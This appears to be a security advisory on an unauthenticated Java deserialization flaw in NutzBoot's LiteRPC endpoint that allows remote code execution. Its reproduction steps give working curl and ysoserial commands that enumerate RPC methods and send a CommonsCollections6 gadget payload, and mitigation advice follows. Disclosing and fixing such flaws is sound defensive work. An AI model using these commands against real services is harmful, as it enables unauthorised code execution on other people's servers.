### Key Information Extraction #### Affected Products - NutzBoot (LiteRPC + Loach modules) #### Version Information - **Affected Versions**: 2.6.0-SNAPSHOT (current dev branch, check specific commits manually) Earlier versions that exposed the LiteRPC HTTP endpoint may also be affected. No fixed version has been released yet. - **Vendor Website**: [Nutz Framework](https://nutzam.com) #### Vulnerability Type - Unauthorized Java deserialization leading to Remote Code Execution (RCE) #### Vulnerability Cause 1. `HttpServletRpcEndpoint` unconditionally accepts serialized data from attackers and directly invokes `readObject()` to deserialize the object. 2. `LoachClient` unconditionally publishes all RPC registration information, allowing attackers to discover method signatures via `/loach/v1/list`. #### Impact - Attackers can send serialized data without authentication, triggering arbitrary code execution with the privileges of the NutzBoot service process. #### Vulnerability Description - Unauthorized access to `/literpc/endpoint` allows Java deserialization. Default settings lack filtering; attackers can enumerate RPC methods and exploit suitable gadgets to trigger attacks. #### Vulnerability Location - The `/literpc/endpoint` URL is handled by `HttpServletRpcEndpoint`. #### Vulnerability Reproduction Steps 1. Retrieve RPC service metadata: ```bash curl http:///loach/v1/list | jq '.data | keys' ``` 2. Generate malicious serialized payload: ```bash ystoserial CommonsCollections6 calc > payload.bin ``` 3. Send payload to `/literpc/endpoint`: ```bash curl -X POST http:///literpc/endpoint \ -H 'LiteRpc-Klass: io.nutz.cloud.demo.service.UserService' \ -H 'LiteRpc-Method: add:7e18b2f3' \ -H 'LiteRpc-Serializer: jdk' \ --data-binary @payload.bin ``` #### Mitigation Recommendations 1. Disable or remove JDK serialization and switch to secure protocols (e.g., JSON/Kryo) for data transmission. 2. Enforce client-side serialization method specification via parameters instead of request headers. 3. Implement authentication and authorization checks for `/literpc/endpoint`. 4. Restrict access permissions to service listing APIs such as `/loach/v1/list`.